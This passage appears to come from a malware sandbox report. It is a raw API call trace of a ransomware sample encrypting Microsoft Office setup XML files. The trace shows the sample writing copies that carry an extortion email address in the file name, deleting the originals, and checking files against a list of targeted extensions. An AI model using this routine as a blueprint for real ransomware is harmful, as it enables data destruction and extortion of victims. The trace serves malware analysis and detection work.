nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.415] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.415] SetEndOfFile (hFile=0x180) returned 1 [0040.415] CloseHandle (hObject=0x180) returned 1 [0040.416] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.416] SetEndOfFile (hFile=0x19c) returned 1 [0040.417] CloseHandle (hObject=0x19c) returned 1 [0040.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.417] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0040.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.417] lstrlenW (lpString=".doc") returned 4 [0040.417] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.417] lstrlenW (lpString=".docx") returned 5 [0040.417] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.417] lstrlenW (lpString=".pdf") returned 4 [0040.417] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.417] lstrlenW (lpString=".xls") returned 4 [0040.417] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.417] lstrlenW (lpString=".xlsx") returned 5 [0040.417] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.417] lstrlenW (lpString=".ppt") returned 4 [0040.417] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".zip") returned 4 [0040.418] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.418] lstrlenW (lpString=".rar") returned 4 [0040.418] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString=".bz2") returned 4 [0040.418] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString=".7z") returned 3 [0040.418] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".dbf") returned 4 [0040.418] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".1cd") returned 4 [0040.418] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".jpg") returned 4 [0040.418] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".doc") returned 4 [0040.418] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString=".docx") returned 5 [0040.418] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.418] lstrlenW (lpString=".pdf") returned 4 [0040.418] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString=".xls") returned 4 [0040.418] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString=".xlsx") returned 5 [0040.418] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.418] lstrlenW (lpString=".ppt") returned 4 [0040.418] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.418] lstrlenW (lpString=".zip") returned 4 [0040.418] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.419] lstrlenW (lpString=".rar") returned 4 [0040.419] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.419] lstrlenW (lpString=".bz2") returned 4 [0040.419] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.419] lstrlenW (lpString=".7z") returned 3 [0040.419] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.419] lstrlenW (lpString=".dbf") returned 4 [0040.419] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.419] lstrlenW (lpString=".1cd") returned 4 [0040.419] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0040.419] lstrlenW (lpString=".jpg") returned 4 [0040.419] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.419] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.419] lstrlenW (lpString="VisioMUI.XML") returned 12 [0040.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.443] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=9503) returned 1 [0040.443] CloseHandle (hObject=0x208) returned 1 [0040.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20 [0040.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.443] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.443] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.443] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.443] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.445] GetLastError () returned 0x0 [0040.445] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x251f, lpOverlapped=0x0) returned 1 [0040.446] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2520, lpOverlapped=0x0) returned 1 [0040.447] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.447] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.447] SetEndOfFile (hFile=0x204) returned 1 [0040.447] CloseHandle (hObject=0x204) returned 1 [0040.448] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.448] SetEndOfFile (hFile=0x208) returned 1 [0040.449] CloseHandle (hObject=0x208) returned 1 [0040.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.449] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0040.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.449] lstrlenW (lpString=".doc") returned 4 [0040.449] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.449] lstrlenW (lpString=".docx") returned 5 [0040.449] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.449] lstrlenW (lpString=".pdf") returned 4 [0040.449] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.449] lstrlenW (lpString=".xls") returned 4 [0040.449] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.449] lstrlenW (lpString=".xlsx") returned 5 [0040.449] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.449] lstrlenW (lpString=".ppt") returned 4 [0040.450] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".zip") returned 4 [0040.450] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.450] lstrlenW (lpString=".rar") returned 4 [0040.450] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString=".bz2") returned 4 [0040.450] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString=".7z") returned 3 [0040.450] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".dbf") returned 4 [0040.450] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".1cd") returned 4 [0040.450] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".jpg") returned 4 [0040.450] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".doc") returned 4 [0040.450] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString=".docx") returned 5 [0040.450] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.450] lstrlenW (lpString=".pdf") returned 4 [0040.450] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString=".xls") returned 4 [0040.450] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString=".xlsx") returned 5 [0040.450] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.450] lstrlenW (lpString=".ppt") returned 4 [0040.450] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.450] lstrlenW (lpString=".zip") returned 4 [0040.450] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.451] lstrlenW (lpString=".rar") returned 4 [0040.451] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.451] lstrlenW (lpString=".bz2") returned 4 [0040.451] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.451] lstrlenW (lpString=".7z") returned 3 [0040.451] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.451] lstrlenW (lpString=".dbf") returned 4 [0040.451] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.451] lstrlenW (lpString=".1cd") returned 4 [0040.451] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.451] lstrlenW (lpString=".jpg") returned 4 [0040.451] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.451] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.451] lstrlenW (lpString="SETUP.XML") returned 9 [0040.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.452] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2424) returned 1 [0040.452] CloseHandle (hObject=0x208) returned 1 [0040.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20 [0040.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.452] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.452] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.453] GetLastError () returned 0x0 [0040.453] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x978, lpOverlapped=0x0) returned 1 [0040.454] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x980, lpOverlapped=0x0) returned 1 [0040.455] ReadFile (in: hFile=0x208, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0040.455] WriteFile (in: hFile=0x204, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.455] SetEndOfFile (hFile=0x204) returned 1 [0040.455] CloseHandle (hObject=0x204) returned 1 [0040.456] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.456] SetEndOfFile (hFile=0x208) returned 1 [0040.456] CloseHandle (hObject=0x208) returned 1 [0040.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.457] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.457] lstrlenW (lpString=".doc") returned 4 [0040.457] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".docx") returned 5 [0040.457] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.457] lstrlenW (lpString=".pdf") returned 4 [0040.457] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".xls") returned 4 [0040.457] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".xlsx") returned 5 [0040.457] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.457] lstrlenW (lpString=".ppt") returned 4 [0040.457] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.457] lstrlenW (lpString=".zip") returned 4 [0040.457] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.457] lstrlenW (lpString=".rar") returned 4 [0040.457] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".bz2") returned 4 [0040.457] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".7z") returned 3 [0040.457] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.457] lstrlenW (lpString=".dbf") returned 4 [0040.458] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.458] lstrlenW (lpString=".1cd") returned 4 [0040.458] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.458] lstrlenW (lpString=".jpg") returned 4 [0040.458] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.458] lstrlenW (lpString=".doc") returned 4 [0040.458] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".docx") returned 5 [0040.458] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.458] lstrlenW (lpString=".pdf") returned 4 [0040.458] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".xls") returned 4 [0040.458] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".xlsx") returned 5 [0040.458] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.458] lstrlenW (lpString=".ppt") returned 4 [0040.459] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.459] lstrlenW (lpString=".zip") returned 4 [0040.459] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.459] lstrlenW (lpString=".rar") returned 4 [0040.459] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString=".bz2") returned 4 [0040.459] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString=".7z") returned 3 [0040.459] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.459] lstrlenW (lpString=".dbf") returned 4 [0040.459] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.459] lstrlenW (lpString=".1cd") returned 4 [0040.459] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0040.459] lstrlenW (lpString=".jpg") returned 4 [0040.459] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.459] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.459] lstrlenW (lpString="WordMUI.XML") returned 11 [0040.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.460] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1800) returned 1 [0040.460] CloseHandle (hObject=0x208) returned 1 [0040.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20 [0040.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.460] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.460] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0040.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 